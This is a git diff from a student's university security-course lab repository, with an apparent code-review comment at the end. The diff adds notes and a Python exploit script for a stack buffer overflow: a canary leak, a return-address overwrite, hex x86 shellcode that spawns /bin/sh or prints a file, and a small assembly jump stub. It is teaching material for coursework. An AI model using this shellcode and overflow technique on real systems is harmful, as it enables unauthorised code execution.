diff --git a/README.md b/README.md
index 06d46bb44c8149237b0edb3ce03f89233c00526e..63ca6e85e34673a4bf2590fd197174b4184107f7 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,5 @@
 # cs161
+ ucb cs161 labs
 Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
@@ -7,33 +8,9 @@ Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
 https://acropolis.cs.berkeley.edu/~account/webacct/
-Account: cs164-ace
-
-Password:
-
-```
------BEGIN PGP MESSAGE-----
-
-hQIMA6EZKPzHVYaOAQ/+JCpketz1mF7XNV63fhDfF2PYHLU4HoDjA63gRyBnhj2h
-CRVxVF6gRpQhO7yV6YGUEX+w3wIfusRlTml2OAKSmV1dYUtFsP+jvrpac9CmWVhs
-UmB1PR0+YaVZZOIUASuj7cCCPkulUccVWhMGc3soB86hnRj/1zJAGTwIZE5l2x7m
-+xzOGSK8wg42j1a69J5bkZ7gIyzRd/9RYePrbvttvDhELeJeWZiTG/hhL4i1wrWA
-KdR+N0FzwUMNpa5WiHgZhkXOmfVOVcIJBiS7M7c03NTXocqpM8T/3JfwyrGd99Nh
-M7fiwBGpITzGyxPmy/2YIOuCw+EodLTqPNKzwof7VuWh832r8YpwLqeRxFvSdvEJ
-fvMAyqV8CzwB3VNzUDTULd6MMyHZI3nThP9WZPegkjBgLF0ucD30Q63wNRvAd6po
-VVOEepzrAfEtX0ek/me88cRRceBZIhFx1CQMDKZB0blgu59eqGNEtVEs9tck13kl
-qo5ZP6W+SMoCs2RJipVgKP3MnKBFMSj0GuzewSpYpm2XAjK7TS3lLGmlps0+Ok6r
-Ciley/Ns3c7miMcKYn+EVPoZ1J59RWbnxN8xpPoScafryAFYMeGLqtqerAVuj4tv
-5zpixrE3iqwt+3nL4hKdzmwUHywhAJvPclIwUxT9SqY5sFS8ZH5xheO4N1v97SLS
-tgE6esur88tbMaTY8oUOQ3NJ9uFAmrOs9IewRptTZwIQksEzJhjnMegdCm3MPbGX
-6hM/ukIMgA77zzwDiJcZB00NTjk0pFCmdpqVpa2bRYPvDRmIgifIbdsPTtaMNp9j
-YVfeaoGUpN+YWPy/08gpz7/dCl+dMCjzx/5ZXQy1mc8lIu/f9Wh7kJJ8G7cN6CC9
-3TK4iuR3wZ6HbH3R+cljhtgMfOcutTWdrEB+erR4J+setOfWihXs
-=tuDB
------END PGP MESSAGE-----
-```
-
-to change the password: `ssh update.cs.berkeley.edu`
+Account: cs161-atw
+
+To change the password: `ssh update.cs.berkeley.edu`
diff --git a/proj1/161-proj1-5.png b/proj1/161-proj1-5.png
new file mode 100644
index 0000000000000000000000000000000000000000..229d6b14563f7cf5e9df7ef4fa065a645dee6fce
Binary files /dev/null and b/proj1/161-proj1-5.png differ
diff --git a/proj1/explain.md b/proj1/explain.md
index 5b19774640a61d63d0df3b56783bde6a2edf598f..6ab1d7b91eb56ba63acdb08ceeab08c1b7735d84 100644
--- a/proj1/explain.md
+++ b/proj1/explain.md
@@ -223,6 +223,11 @@ with open('/dev/fd/1','wb') as f:
 ## 4
+The solution is easy. Since BUFLEN=16, I send `0123456789ab\x`, then dehexify skips the `\0` and prints everything in canary area.
+
+Now I construct a message with 16 junk characters to fill the buffer, correct canary, another 8 characters to shift ebp & other staffes, and the return address, then the shellcode.
+
+
 ## 5 - motivation
@@ -266,8 +271,22 @@ However, we need a fixed-address writable page to put `%ebp`. The page `0x080480
 Please see the image below. The procedure is too complicated to explain.
+
+Because I have 40 bytes ahead for payload, I can put a shellcode to launch /bin/sh directly. But if I want to create tcp server, I have to write a simple payload and jmp to `&buf+68`. The simple payload is attached below.
+
+```
+// get current addr
+call foo
+foo:
+pop %eax
+
+// 40 + 4+4+4+4+4+4+4 - 5
+add $63, %eax
+jmp *%eax
+```
+I put 5 `nop` at `&buf+68` to make it work even if I have made a mistake.
diff --git a/proj1/solution/interact4 b/proj1/solution/interact4
index 2d70f7bd9702d4cfb9d486cc96a42dba083fab98..b14540e17fdf8be5cf877553b749c5501e9729ed 100755
--- a/proj1/solution/interact4
+++ b/proj1/solution/interact4
@@ -47,17 +47,19 @@ canary = reply_canary
 fill2 = "\0"*8
 retaddr = fuck_raddr("bffffaf4") # "bffffaf4"
 #payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f2f6c73682f62696e545b505389e131d2b00bcd800a", False) # SHELLCODE
+# This payload works! It cat README to stdout. Uncomment print(p.recvline()) to use it.
 payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f636174682f62696e545b506841444d45682f2f524568652f6a7a682f686f6d545950515389e131d2b00bcd80", False) # SHELLCODE
-#payload = SHELLCODE
+# This payload also works! It cat README to stderr.
+payload = SHELLCODE + '\0'
 msg = fill1 + canary + fill2 + retaddr + payload + '\n'
 #print(msg)
 p.send(msg)
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+##print(p.recvline())
 # HINT: the last line of your exploit should look something like:
 # p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
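Review bot: `payload` is assigned twice in a row on the new side — the `fuck_raddr("6a3158…", False)` assignment is immediately overwritten by `payload = SHELLCODE + '\0'`, so the first one is dead code and the new comment "This payload works!" above it describes a value that never reaches `msg`. If both variants are meant to stay, comment the first assignment out like the one above it, `#payload = fuck_raddr("6a3158…", False) # SHELLCODE`, or choose between them with one variable instead of toggling comments. The same toggling appears with the five `print(p.recvline())` lines, which are now commented out while the new comment still says "Uncomment print(p.recvline()) to use it"; a single `if` on a flag such as `READ_REPLY = False` would state the intent better than commented-out code. This is a flat script whose statement run starts before and continues after the hunk.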